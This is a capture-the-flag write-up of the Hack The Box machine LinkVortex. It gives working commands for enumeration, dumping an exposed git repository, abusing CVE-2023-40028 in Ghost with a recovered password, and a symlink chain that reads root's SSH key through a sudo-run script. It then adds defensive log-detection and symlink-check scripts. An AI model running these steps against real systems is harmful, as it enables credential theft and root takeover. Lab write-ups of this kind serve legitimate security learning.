Linkvortex
March 02, 2025
Created by: 0xyassine | Page: Hack The Box | Difficulty: Easy | OS: Linux

I start with a scan of all ports, then scan the versions and technologies running on the open ports I found:

    nmap -p- --open --min-rate 5000 -Pn -sS 10.10.11.47 -oG scan
    nmap -p22,80 -sCV -Pn 10.10.11.47 -oN ports

I go to the site and see that an outdated version of Ghost is running. I find that it is affected by CVE-2023-40028, but I need a valid credential to be able to abuse it. I search for subdomains and find one:

    wfuzz -c -t 100 --hh=230 -w /usr/share/amass/wordlists/subdomains-top1mil-110000.txt -H "Host: FUZZ.linkvortex.htb" http://linkvortex.htb

Listing the subdomain I found, I see an exposed git repository. I download it with git-dumper:

    git-dumper "http://dev.linkvortex.htb/.git" /home/rufo/linkVortex/content/example

Searching the repository files, I find some passwords. Trying them against the vulnerability I found earlier, I get a valid credential:

    ./CVE-2023-40028.sh -u admin@linkvortex.htb -p OctopiFociPilfer45

I modify the script to point to the endpoint and manage to read internal files of the machine (LFI). Listing the repository files, I find some credentials in the production environment configuration file. With these credentials I am able to log in via ssh and read the first flag.

Listing the system files, I see that I can execute /opt/ghost/clean_symlink.sh as root, passing any file as its argument. I create a pair of symbolic links so that the script reads the root user's ssh key:

    ln -s /root/.ssh/id_rsa link1.txt
    ln -s /tmp/a/link1.txt duo.png
    sudo CHECK_CONTENT=true /usr/bin/bash /opt/ghost/clean_symlink.sh /tmp/a/duo.png

With this key I connect via ssh as root and read the second flag.
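The exposed repository on the dev subdomain is pulled file by file, which leaves a distinctive trace in the web server's access log. As an added example (not part of the original writeup or of the machine), this is the kind of check a defender would run over such a log: it counts successful requests for paths under /.git/ per client and reports any client over a threshold. The log lines, client addresses, user agents and threshold are all constructed for the example.

```shell
#!/bin/sh
# Added example: flag clients that successfully fetched many paths under
# /.git/ in a combined-format access log. The sample log lines, addresses
# and user agents below are constructed, not taken from the machine.

SAMPLE_LOG="$(mktemp)"
cat > "$SAMPLE_LOG" <<'EOF'
10.0.0.5 - - [02/Mar/2025:10:00:01 +0000] "GET /.git/HEAD HTTP/1.1" 200 23 "-" "git-dumper/1.0"
10.0.0.5 - - [02/Mar/2025:10:00:01 +0000] "GET /.git/config HTTP/1.1" 200 310 "-" "git-dumper/1.0"
10.0.0.5 - - [02/Mar/2025:10:00:02 +0000] "GET /.git/index HTTP/1.1" 200 4096 "-" "git-dumper/1.0"
10.0.0.5 - - [02/Mar/2025:10:00:02 +0000] "GET /.git/objects/ab/cdef0123 HTTP/1.1" 200 812 "-" "git-dumper/1.0"
10.0.0.9 - - [02/Mar/2025:10:05:00 +0000] "GET /index.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.9 - - [02/Mar/2025:10:05:01 +0000] "GET /.git/HEAD HTTP/1.1" 404 162 "-" "Mozilla/5.0"
EOF

# Print "client count" for every client with at least $2 (default 3)
# successful (HTTP 200) requests for paths under /.git/ in log file $1.
# Fields follow the combined log format: $1 client, $7 request path, $9 status.
git_dump_clients() {
    log="$1"; threshold="${2:-3}"
    awk -v t="$threshold" '
        $7 ~ /^\/\.git(\/|$)/ && $9 == 200 { hits[$1]++ }
        END { for (ip in hits) if (hits[ip] >= t) print ip, hits[ip] }
    ' "$log" | sort
}

# Demo run over the constructed log: only 10.0.0.5 is reported.
git_dump_clients "$SAMPLE_LOG"
```

The status filter is deliberate: a single probe for /.git/HEAD that returns 404 (the second client above) is noise, while a run of 200 responses for /.git/ paths means the repository was actually readable and has most likely been copied, so the credentials it contains should be treated as exposed.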
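The privilege escalation works because the root-run script decides what to read from a link that itself points at another link. As an added example, not the machine's clean_symlink.sh (which the writeup does not reproduce), here is one way such a script can check a symlink safely: resolve the whole chain with readlink -f (GNU coreutils) and compare the final target with an allowed directory before reading anything. The directory layout, file names and contents are constructed for the example.

```shell
#!/bin/sh
# Added example: resolve a symlink chain completely before deciding whether
# its target may be read. Directory names, files and contents are constructed.

# Return 0 if the final target of $1 lies inside $2 (the allowed root),
# 1 otherwise. readlink -f (GNU coreutils) follows every link in the chain,
# so an intermediate link cannot hide where the path really ends up.
check_symlink_target() {
    link="$1"; allowed_root="$2"
    target="$(readlink -f -- "$link")" || return 1
    root="$(readlink -f -- "$allowed_root")" || return 1
    case "$target" in
        "$root"/*) return 0 ;;
        *) return 1 ;;
    esac
}

# Only print a file once its resolved target has passed the check.
safe_cat() {
    if check_symlink_target "$1" "$2"; then
        cat -- "$(readlink -f -- "$1")"
    else
        echo "refusing to read $1: resolves outside $2" >&2
        return 1
    fi
}

# Constructed demo: content/ is the only directory the script may read from.
# duo.png -> link1.txt -> secret/key mimics a two-step chain that ends
# outside it; ok.png -> content/image.png stays inside.
demo_dir="$(mktemp -d)"
mkdir -p "$demo_dir/content" "$demo_dir/secret"
echo "private" > "$demo_dir/secret/key"
echo "public" > "$demo_dir/content/image.png"
ln -s "$demo_dir/secret/key" "$demo_dir/content/link1.txt"
ln -s "$demo_dir/content/link1.txt" "$demo_dir/content/duo.png"
ln -s "$demo_dir/content/image.png" "$demo_dir/content/ok.png"

for f in ok.png duo.png; do
    if safe_cat "$demo_dir/content/$f" "$demo_dir/content"; then
        echo "$f: readable"
    else
        echo "$f: rejected"
    fi
done
```

The comparison is made on the fully resolved target, not on what the first link points to, which is the difference between a check that can be bypassed with a second link and one that cannot. Running the script as root with a user-controlled argument is still worth avoiding; the check only limits what a misuse can reach.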